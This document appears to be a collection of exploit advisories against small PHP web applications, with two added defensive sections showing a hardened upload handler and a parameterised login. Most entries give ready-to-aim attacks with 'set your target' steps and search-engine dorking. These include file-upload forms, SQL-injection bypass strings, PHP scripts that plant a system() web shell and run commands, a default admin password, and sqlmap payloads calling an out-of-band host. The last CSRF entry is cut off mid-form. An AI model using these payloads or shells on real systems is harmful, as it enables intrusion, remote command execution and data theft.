<pre><code>=============================================================================================================================================<br />| # Title : Online Notice Board System project 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/php/7394/online-notice-board-system |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code uploads an executable malicious file remotely.<br /><br />[+] Go to line 10.<br /><br />[+] Set the target site link, save the changes and apply.<br /><br />[+] Save the code as poc.html.<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Update Profile Picture</title><br /></head><br /><body><br /> <h2>Update Profile Picture</h2><br /> <form action="http://127.0.0.1/Online%20Notice%20Board%20System/user/index.php?page=update_profile_pic" method="POST" enctype="multipart/form-data"><br /> <!-- File input --><br /> <label for="f">Choose a profile picture:</label><br /> <input type="file" id="f" name="f" required><br><br><br /><br /> <!-- Submit button --><br /> <input type="submit" name="update" value="Update Profile Picture"><br /> </form><br /></body><br /></html><br /><br />[+] http://127.0.0.1/Online%20Notice%20Board%20System/images/webadmin.php<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : online bus ticket booking Website v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code uploads an executable malicious file remotely.<br /><br />[+] Go to line 11.<br /><br />[+] Set the target site link, save the changes and apply.<br /><br />[+] Save the code as poc.html.<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Company Form</title><br /></head><br /><body><br /><br /> <!-- Form for company details --><br /> <form name="" action="http://127.0.0.1/online-bus-ticket-booking-Website/admin_companylist.php" method="POST" enctype="multipart/form-data"><br /> <br /> <!-- File input for logo --><br /> <label for="logo">Company Logo:</label><br /> <input type="file" id="logo" name="logo"><br /> <br><br /><br /> <!-- Submit button for update --><br /> <input type="submit" name="update" value="Update"><br /> <br /> </form><br /><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Old Age Home Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This payload injects PHP code containing a back door (SQL injection in the admin login, written to disk with INTO OUTFILE).<br /><br />[+] Lines 16 and 19: set your target.<br /><br />[+] Save the payload as poc.php.<br /><br />[+] Usage from cmd : C:\www\test>php poc.php<br /><br />[+] payload :<br /><br /><?php<br />// Required libraries: helper that sends a form-encoded POST and returns the response body<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// Fixed target URL (keep the trailing slash)<br />$url = 'http://localhost/oahms/';<br /><br />// Fixed filesystem path the file is written to (must be inside the web root of $url); backslashes are doubled for the MySQL string literal<br />$path = 'C:\www\oahms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send a PHP file containing the backdoor: UNION SELECT ... INTO OUTFILE through the username field<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'submit' => ''<br />];<br />send_request($url . "admin/login.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// Execute the uploaded PHP file and test the backdoor<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Membership Management System version 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This payload injects PHP code containing a back door (SQL injection login bypass, then a PHP file uploaded through the settings logo field).<br /><br />[+] Line 20: set your target.<br /><br />[+] Save the payload as poc.php.<br /><br />[+] Usage from cmd : C:\www\test>php poc.php<br /><br />[+] payload :<br /><br /><?php<br />// Function to generate a random string of a given length<br />function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {<br /> return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);<br />}<br /><br />// Generating a random web shell file name<br />$shellFile = randomGen() . ".php";<br /><br />// Creating the payload for the login (SQL injection in the email field)<br />$payload = [<br /> 'email' => "test@mail.com' or 0=0 #", // Adjust based on the target<br /> 'password' => 'a',<br /> 'login' => ''<br />];<br /><br />$session = curl_init();<br /><br />// Target base URL (change this to your target IP or domain)<br />$urlBase = "http://127.0.0.1/Membership/";<br /><br />// Login<br />$url = $urlBase . "index.php";<br />echo "=== Executing SQL Injection ===\n";<br /><br />// Set cURL options for the POST request<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));<br />curl_setopt($session, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($session, CURLOPT_HEADER, true); // Include headers in output<br />curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);<br />curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging (written to stderr)<br /><br />// Execute the login request<br />$response = curl_exec($session);<br /><br />// Separate headers from body<br />$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);<br />$headers = substr($response, 0, $header_size);<br />$body = substr($response, $header_size);<br /><br />// Extract the session cookie from the first 'Set-Cookie' header, if present<br />preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);<br />$cookie = '';<br />if (isset($matches[1][0])) {<br /> $cookie = $matches[1][0];<br />}<br /><br />// Print headers for debugging<br />echo "=== Response Headers ===\n";<br />echo $headers;<br /><br />if ($cookie) {<br /> echo "=== Authenticated admin cookie: " . $cookie . " ===\n";<br />} else {<br /> echo "Set-Cookie header not found in the response.\n";<br /> exit();<br />}<br /><br />// Prepare to upload the shell through the settings form<br />$url = $urlBase . "settings.php";<br /><br />// Get user input for the command to execute<br />echo "Enter the command to execute: ";<br />$cmd_input = trim(fgets(STDIN));<br /><br />// PHP code to execute the command received from the user<br />$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";<br /><br />// Prepare the multipart/form-data body by hand so the filename and Content-Type are fully controlled<br />$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br />$body = "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";<br />$body .= "Membership System\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";<br />$body .= "$\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";<br />$body .= 'Content-Type: application/x-php' . "\r\n\r\n";<br />$body .= $php_code . "\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";<br />$body .= "\r\n";<br />$body .= "--$boundary--\r\n";<br /><br />// Set cURL options for the file upload, reusing the session cookie obtained above<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, $body);<br />curl_setopt($session, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . $boundary,<br /> 'Cookie: ' . $cookie<br />]);<br /><br />echo "=== Logging in and uploading shell " . $shellFile . " ===\n";<br /><br />// Execute the upload request<br />$response = curl_exec($session);<br /><br />// Close the cURL session<br />curl_close($session);<br /><br />// Request the shell for testing<br />$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);<br />echo "=== Issuing the command: " . $requestUrl . " ===\n";<br /><br />echo "=== CURL OUTPUT ===\n";<br />echo file_get_contents($requestUrl);<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Live Membership Management System version 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/php/12997/live-membership-system-in-php-php-project-source-code |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This payload injects PHP code containing a back door (SQL injection login bypass, then a PHP file uploaded through the settings logo field).<br /><br />[+] Line 20: set your target.<br /><br />[+] Save the payload as poc.php.<br /><br />[+] Usage from cmd : C:\www\test>php poc.php<br /><br />[+] payload :<br /><br /><?php<br />// Function to generate a random string of a given length<br />function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {<br /> return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);<br />}<br /><br />// Generating a random web shell file name<br />$shellFile = randomGen() . ".php";<br /><br />// Creating the payload for the login (SQL injection in the email field)<br />$payload = [<br /> 'email' => "test@mail.com' or 0=0 #", // Adjust based on the target<br /> 'password' => 'a',<br /> 'login' => ''<br />];<br /><br />$session = curl_init();<br /><br />// Target base URL (change this to your target IP or domain)<br />$urlBase = "http://127.0.0.1/Membership/";<br /><br />// Login<br />$url = $urlBase . "index.php";<br />echo "=== Executing SQL Injection ===\n";<br /><br />// Set cURL options for the POST request<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));<br />curl_setopt($session, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($session, CURLOPT_HEADER, true); // Include headers in output<br />curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);<br />curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging (written to stderr)<br /><br />// Execute the login request<br />$response = curl_exec($session);<br /><br />// Separate headers from body<br />$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);<br />$headers = substr($response, 0, $header_size);<br />$body = substr($response, $header_size);<br /><br />// Extract the session cookie from the first 'Set-Cookie' header, if present<br />preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);<br />$cookie = '';<br />if (isset($matches[1][0])) {<br /> $cookie = $matches[1][0];<br />}<br /><br />// Print headers for debugging<br />echo "=== Response Headers ===\n";<br />echo $headers;<br /><br />if ($cookie) {<br /> echo "=== Authenticated admin cookie: " . $cookie . " ===\n";<br />} else {<br /> echo "Set-Cookie header not found in the response.\n";<br /> exit();<br />}<br /><br />// Prepare to upload the shell through the settings form<br />$url = $urlBase . "settings.php";<br /><br />// Get user input for the command to execute<br />echo "Enter the command to execute: ";<br />$cmd_input = trim(fgets(STDIN));<br /><br />// PHP code to execute the command received from the user<br />$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";<br /><br />// Prepare the multipart/form-data body by hand so the filename and Content-Type are fully controlled<br />$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br />$body = "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";<br />$body .= "Membership System\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";<br />$body .= "$\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";<br />$body .= 'Content-Type: application/x-php' . "\r\n\r\n";<br />$body .= $php_code . "\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";<br />$body .= "\r\n";<br />$body .= "--$boundary--\r\n";<br /><br />// Set cURL options for the file upload, reusing the session cookie obtained above<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, $body);<br />curl_setopt($session, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . $boundary,<br /> 'Cookie: ' . $cookie<br />]);<br /><br />echo "=== Logging in and uploading shell " . $shellFile . " ===\n";<br /><br />// Execute the upload request<br />$response = curl_exec($session);<br /><br />// Close the cURL session<br />curl_close($session);<br /><br />// Request the shell for testing<br />$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);<br />echo "=== Issuing the command: " . $requestUrl . " ===\n";<br /><br />echo "=== CURL OUTPUT ===\n";<br />echo file_get_contents($requestUrl);<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Expense Management System v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_expensemanagement-zip.zip |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code uploads an executable malicious file remotely.<br /><br />[+] Go to line 11.<br /><br />[+] Set the target site link, save the changes and apply.<br /><br />[+] Save the code as poc.html.<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Sign Up Form</title><br /></head><br /><body><br /><br /> <!-- Sign Up Form --><br /> <form action="http://127.0.0.1/ExpenseManagement/templates/2-sign-up.php" method="POST" enctype="multipart/form-data"><br /> <br /> <!-- File input --><br /> <label for="inpFile">Upload File:</label><br /> <input type="file" id="inpFile" name="inpFile"><br /> <br><br /><br /> <!-- Full name input --><br /> <label for="full_name">Full Name:</label><br /> <input type="text" id="full_name" name="full_name"><br /> <br><br /><br /> <!-- Email input --><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email"><br /> <br><br /><br /> <!-- Username input --><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username"><br /> <br><br /><br /> <!-- Password input --><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password"><br /> <br><br /><br /> <!-- Confirm password input --><br /> <label for="password_confirm">Confirm Password:</label><br /> <input type="password" id="password_confirm" name="password_confirm"><br /> <br><br /><br /> <!-- Submit button --><br /> <input type="submit" name="register" value="Register"><br /><br /> </form><br /><br /></body><br /></html><br /><br />[+] http://127.0.0.1/ExpenseManagement/static/profileImages/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
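<p>The upload advisories above (Online Notice Board field <code>f</code>, online bus ticket booking field <code>logo</code>, Expense Management field <code>inpFile</code>, and the <code>image</code> field of the Reservation Management System further down) all rest on the same defect: the server keeps the client's filename and content and drops them under the document root, where Apache then executes <code>webadmin.php</code> as PHP. The handler below is an added example written for this page, not code from any of those vendors. It assumes a form field named <code>upload</code>, a storage directory <code>uploads/</code> beside the script and a 2 MiB limit; all three are illustrative choices.</p>

```php
<?php
// Added example (not from any of the vendors above): a hardened image-upload handler.
// Assumed names, chosen for illustration: form field 'upload', directory uploads/ next to this script.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;

// MIME type detected from the file CONTENT -> extension the server assigns.
// The client's filename and Content-Type header are never consulted.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and store it under a server-chosen random name.
 * Returns the stored filename; throws RuntimeException on any policy violation.
 */
function store_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload missing or failed');
    }
    // Refuses paths that were not received in this request's multipart body.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Sniff the real type from the bytes; $file['type'] is attacker-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('content type not allowed');
    }
    // Independent second check: the bytes must decode as an image at all.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }

    // Server-chosen name and extension: no client string reaches the filesystem,
    // so "webadmin.php", "../x", double extensions and null bytes are irrelevant.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;

    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the web server, never executable
    return $name;
}

// Defence in depth: even if a .php file ever lands in uploads/, Apache must not run it.
// For mod_php, an uploads/.htaccess (needs AllowOverride) such as:
//   php_flag engine off
//   <FilesMatch "\.(php|phtml|phar|php[0-9]|inc)$">
//       Require all denied
//   </FilesMatch>
// For php-fpm, put the same <FilesMatch> block in the vhost's <Directory> for uploads/.
// Better still, keep the directory outside the document root and serve files through a
// script that sets Content-Type from ALLOWED and X-Content-Type-Options: nosniff.

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) {
    try {
        $stored = store_image($_FILES['upload']);
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

<p>The content checks alone are not what stops the PoCs: a valid JPEG with PHP tucked into an EXIF comment passes <code>finfo</code> and <code>getimagesize</code>. What blocks execution is that the stored name never carries a <code>.php</code> extension and the directory is configured not to execute anything, so the two checks only keep junk out. If you need to be sure no payload survives at all, re-encode the image through GD (<code>imagecreatefromstring</code> followed by <code>imagejpeg</code>/<code>imagepng</code>) before storing it.</p>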
<pre><code>====================================================================================================================================<br />| # Title : Beauty Parlour & Saloon Management System 1.1 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use payload in both username and password : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/studentms/admin/login.php <br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Auto/Taxi Stand Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] Use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/blms/banker/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi<br />### Bonus: FU + RCE & XSS - Information disclosure<br />## Author: nu11secur1ty<br />## Date: 09/14/2024<br />## Vendor: https://github.com/oretnom23<br />## Software:<br />https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `password` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submitted<br />in the password parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all the<br />information from the database of this system, and can take very malicious<br />actions against the owner of this application!<br /><br />STATUS: HIGH - Vulnerability for deprecation!<br />WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!<br />https://github.com/oretnom23<br /><br /><br />[+] Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: password (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT 9033=9033 AND ('ehPW'='ehPW<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)<br /><br />## Time spent:<br />00:17:00<br /><br /><br /></code></pre>
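<p>Four of the advisories above are the same bug in four login forms: the Old Age Home admin login (<code>username</code>, escalated to <code>UNION SELECT ... INTO OUTFILE</code>), the two Membership systems (<code>email</code> with <code>' or 0=0 #</code>), the Beauty Parlour login (<code>' or 0=0 ##</code> in both fields) and SFTRS (<code>password</code> with an out-of-band <code>load_file</code>). Each concatenates the POSTed strings into <code>WHERE username='...' AND password='...'</code>. The login below is an added example for this page, not any vendor's code; the table <code>users(id, username, password_hash, is_admin)</code>, the PDO DSN and the <code>DB_PASS</code> environment variable are assumptions made for illustration.</p>

```php
<?php
// Added example (not the vendors' code): login without string-built SQL, replacing the
// "WHERE username='$u' AND password='$p'" pattern that the advisories above exploit.
// Assumed, for illustration only: table users(id, username, password_hash, is_admin),
// MySQL over PDO, the DB password in the DB_PASS environment variable.
declare(strict_types=1);

function db(): PDO
{
    return new PDO(
        'mysql:host=127.0.0.1;dbname=app;charset=utf8mb4',
        'app_user',
        getenv('DB_PASS') ?: '',
        [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION, // errors throw instead of returning false
            PDO::ATTR_EMULATE_PREPARES   => false,                  // server-side prepares: values never enter the SQL text
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]
    );
}

/**
 * Returns the user row on success, null otherwise. The inputs are bound as parameters,
 * so "' or 0=0 #", "admin' union select ... into outfile ..." and
 * "'+(select load_file(...))+'" are compared as literal strings and match nothing.
 */
function authenticate(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password_hash, is_admin FROM users WHERE username = ? LIMIT 1'
    );
    $stmt->execute([$username]);
    $row = $stmt->fetch();

    // Run the (slow) hash check even for unknown users, so response time does not
    // reveal which usernames exist. The dummy hash is computed once per process.
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);
    }
    $hash = ($row !== false) ? (string) $row['password_hash'] : $dummy;
    if (!password_verify($password, $hash) || $row === false) {
        return null;
    }
    // Transparent upgrade of hashes created with an older cost or algorithm.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $upd = $pdo->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
        $upd->execute([password_hash($password, PASSWORD_DEFAULT), $row['id']]);
    }
    return $row;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $user = authenticate(
        db(),
        (string) ($_POST['username'] ?? ''),
        (string) ($_POST['password'] ?? '')
    );
    if ($user === null) {
        http_response_code(401);
        exit('Invalid credentials');
    }
    session_start();
    session_regenerate_id(true);           // fresh session id after the privilege change
    $_SESSION['uid']      = (int) $user['id'];
    $_SESSION['is_admin'] = (bool) $user['is_admin'];
    header('Location: dashboard.php');
    exit;
}
```

<p>Two of the payloads also depend on the database account, not only on the query. <code>INTO OUTFILE</code> (Old Age Home) and <code>LOAD_FILE()</code> (SFTRS) both require the MySQL <code>FILE</code> privilege and are disabled when <code>secure_file_priv</code> is set to a directory or to NULL. Granting the web application's account only <code>SELECT</code>, <code>INSERT</code>, <code>UPDATE</code> and <code>DELETE</code> on its own schema, and leaving <code>secure_file_priv</code> at its restrictive default, removes the file-write path even if a second injection point is found later.</p>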
<pre><code>=============================================================================================================================================<br />| # Title : Reservation Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code uploads an executable malicious file remotely (no CSRF token; submitted from the attacker's page while an admin is logged in).<br /> <br />[+] Line 8 : set your target URL.<br /><br />[+] Save the payload as poc.html.<br /><br />[+] payload : <br /><br /><div class="modal-content"><br /> <div class="modal-header"><br /> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button><br /> <h4 class="modal-title">Add New Menu</h4><br /> </div><br /> <div class="modal-body"><br /> <!--start form--><br /> <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data"><br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Menu Name</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Category</label><br /> <div class="col-lg-8"> <br /> <select class="form-control select2" id="exampleSelect1" name="cat" required=""><br /> <option value="9">Dessert</option><br /> <option value="6">Main Course</option><br /> <option value="7">Pasta</option><br /> <option value="10">Rice</option><br /> </select><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Subcategory</label><br /> <div class="col-lg-8"> <br /> <select class="form-control select2" id="exampleSelect1" name="subcat"><br /> <option>Drinks</option><br /> <option>Lunch and Dinner</option><br /> <option>Mirienda</option><br /> <option>Non Combo Meal</option><br /> </select><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Description</label><br /> <div class="col-lg-8"> <br /> <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Price</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" 